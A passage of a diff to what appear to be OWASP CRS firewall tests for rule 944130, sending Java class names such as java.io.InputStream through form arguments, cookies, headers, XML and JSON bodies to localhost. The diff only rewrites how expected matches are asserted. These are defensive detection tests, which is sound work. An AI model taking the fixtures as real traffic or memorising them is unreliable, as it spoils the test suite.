"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log: + expect_ids: [944130] + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log: + expect_ids: [944130] + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log: + expect_ids: [944130] + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-163 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 163 desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-164 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log: + expect_ids: [944130] + - test_id: 164 desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStreamReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-165 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log: + expect_ids: [944130] + - test_id: 165 desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStreamReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-166 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log: + expect_ids: [944130] + - test_id: 166 desc: "Argument test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-167 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 167 desc: "Argument name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-168 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log: + expect_ids: [944130] + - test_id: 168 desc: "Cookie test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-169 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 169 desc: "Cookie name includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.LineNumberReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-170 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 170 desc: "Request header test includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.LineNumberReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-171 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944130] + - test_id: 171 desc: "XML attribute value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-172 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944130] + - test_id: 172 desc: "XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-173 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 173 desc: "Nested XML element value includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-174 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log: + expect_ids: [944130] + - test_id: 174 desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.LineNumberReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-175 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 